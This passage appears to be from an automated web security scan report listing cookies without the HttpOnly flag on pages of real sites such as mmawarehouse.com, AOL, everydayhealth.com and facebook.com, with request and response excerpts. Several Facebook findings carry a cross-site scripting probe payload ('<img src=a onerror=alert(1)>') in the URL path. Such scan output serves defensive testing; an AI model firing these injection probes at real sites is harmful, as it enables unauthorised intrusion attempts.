The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=CBIDGODBKHCLFONNGAPGKJPO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.19. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=DBIDGODBMBCIKBCOHINKMKNJ; path=/
History50=37411; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.20. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=GBIDGODBMMGIFDGKICDMCOFN; path=/
History50=30854; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.21. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=IBIDGODBOHAHGLIENKMIAPLN; path=/
History50=22942; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.22. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=JBIDGODBICLOONOEAHEOGHJJ; path=/
History50=34079; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.23. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=CCIDGODBOBGJFCPIECHDNCDM; path=/
History50=36372; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.24. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=PCIDGODBKOKMLDILKMODCCGD; path=/
History50=32062; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.25. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mmawarehouse.com
Path:	/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCASTQSBA=IDIDGODBDNKIGNLKGFIAJFAI; path=/
History50=33949; expires=Fri, 20-May-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.26. http://www.truveo.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.truveo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.27. http://www.truveo.com/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.truveo.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.28. http://yellowpages.aol.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://yellowpages.aol.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=17224104F8E073DB96F56D00E1212059; Path=/yellowpages
sess_id=3fd40c2ad4939b38; Domain=yellowpages.aol.com; Expires=Thu, 05-May-2011 01:29:15 GMT; Path=/
reqId=ae3b17aa1bed2d84; Domain=yellowpages.aol.com; Path=/
local_guid=7b579074211441ec; Domain=yellowpages.aol.com; Expires=Fri, 04-May-2012 00:59:15 GMT; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?icid=navbar_YP_main5 HTTP/1.1
Host: yellowpages.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

11.29. http://www.citysbest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?icid=navbar_citysbest_main5 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.30. http://www.dailyfinance.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243_64_12_75_136=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:56:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_64_12_75_136=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:56:29 GMT; path=/
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 127215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...

11.31. http://www.dailyfinance.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?icid=navbar_finance_main5 HTTP/1.1
Host: www.dailyfinance.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.32. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

.ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.33. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

.ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.34. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

.ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.35. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

.ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.36. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.37. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=hrTlo; path=/; domain=.facebook.com
reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.38. http://www.facebook.com/10000082482078341583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.39. http://www.facebook.com/10000082482078341583ab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.40. http://www.facebook.com/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.41. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.42. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.43. http://www.facebook.com/HockeyKen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HockeyKen

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.44. http://www.facebook.com/KickIceForever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/KickIceForever

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.45. http://www.facebook.com/Loizza previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Loizza

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.46. http://www.facebook.com/burkerkink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/burkerkink

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.47. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.48. http://www.facebook.com/deedee.perez1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/deedee.perez1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
